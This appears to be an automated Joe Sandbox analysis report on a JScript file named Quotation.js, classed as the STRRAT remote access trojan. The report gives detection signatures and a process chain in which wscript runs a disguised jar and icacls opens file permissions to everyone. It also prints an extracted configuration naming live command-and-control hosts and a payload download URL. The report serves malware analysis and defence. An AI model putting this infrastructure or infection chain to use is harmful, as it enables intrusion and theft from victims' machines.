Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation.js

Overview

General Information

Sample name:Quotation.js
Analysis ID:1562892
MD5:c3e39b8ea6a8813ffb4001cbd044a027
SHA1:36dc1ec5510e2531b23931b317e25ae2240df789
SHA256:1cef3a638243fd070d898fb3edabf7676d050246e736b73cdb9f23201d4f7858
Tags:jsuser-abuse_ch
Infos:

Detection

STRRAT
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected STRRAT
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected AllatoriJARObfuscator
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7512 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • javaw.exe (PID: 7588 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\nvbyatbnf.txt" MD5: 6E0F4F812AE02FBCB744A929E74A04B8)
      • icacls.exe (PID: 7644 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: 2E49585E4E08565F52090B144062F97E)
        • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": "harold.jetos.com:3608", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "harold.jetos.com:3608", "lid": "khonsari", "Startup": "false", "Secondary Startup": "true", "Scheduled Task": "true"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
    00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmpINDICATOR_JAVA_Packed_AllatoriDetects files packed with Allatori Java ObfuscatorditekSHen
    • 0x2fb4:$s1: # Obfuscation by Allatori Obfuscator
    00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_STRRATYara detected STRRATJoe Security
      00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
        00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmpINDICATOR_JAVA_Packed_AllatoriDetects files packed with Allatori Java ObfuscatorditekSHen
        • 0x24a4:$s1: # Obfuscation by Allatori Obfuscator
        Click to see the 3 entries

        System Summary

        barindex
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js", ProcessId: 7512, ProcessName: wscript.exe
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js", ProcessId: 7512, ProcessName: wscript.exe
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 00000000.00000003.1720420378.00000252C43EE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: STRRAT {"C2 list": "harold.jetos.com:3608", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "harold.jetos.com:3608", "lid": "khonsari", "Startup": "false", "Secondary Startup": "true", "Scheduled Task": "true"}
        Source: Quotation.jsReversingLabs: Detection: 18%
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49739 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49740 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49742 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49748 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49749 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49750 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49752 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49753 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49755 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49758 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49757 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49760 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49761 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49762 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49763 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49764 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49766 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49765 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49767 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49768 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49770 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49771 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49772 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49784 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49785 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49786 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49792 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49803 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49804 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49805 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49811 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49818 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49822 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49821 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49829 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49835 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49837 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49839 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49848 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49854 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49855 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49856 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49867 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49873 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49874 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49875 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49886 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49891 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49893 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49894 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49904 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49908 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49911 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49912 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49923 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49927 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49928 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49931 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49942 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49946 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49944 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49950 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49961 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49963 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49964 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49968 version: TLS 1.2
        Source: Joe Sandbox ViewIP Address: 199.232.192.209 199.232.192.209
        Source: Joe Sandbox ViewIP Address: 20.233.83.145 20.233.83.145
        Source: Joe Sandbox ViewJA3 fingerprint: 026e5ca865ce1f09da3a81d8a4e3effb
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: repo1.maven.org
        Source: global trafficDNS traffic detected: DNS query: github.com
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A5FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A5FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A5FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A604000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A604000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A60B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://java.oracle.com/
        Source: javaw.exe, 00000001.00000002.2988463931.0000000015B9A000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.2936252909.0000000015B7B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1774418678.0000000015B72000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.2936715902.0000000015B93000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A70D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://null.oracle.com/
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A5FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
        Source: wscript.exe, 00000000.00000003.1710702029.00000252C3038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wshsoft.company/jv/jrex.zip
        Source: wscript.exe, 00000000.00000003.1721139336.00000252C4DF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wshsoft.company/jv/jrex.zipnf
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.allatori.com
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A992000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A70D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
        Source: javaw.exe, 00000001.00000002.2981310516.000000000508C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.000000000500A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005396000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005159000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
        Source: javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A70D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repo1.mave
        Source: javaw.exe, 00000001.00000002.2981310516.00000000050D2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005381000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.000000000500A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005136000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.000000000518C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.00000000051B1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005396000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repo1.maven.org
        Source: javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A550000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
        Source: javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2989008162.0000000016059000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A550000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2989078586.00000000160EA000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005148000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2980872495.0000000001668000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2988964468.0000000015FC8000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2989156025.0000000016179000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
        Source: javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A550000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jarar
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu
        Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
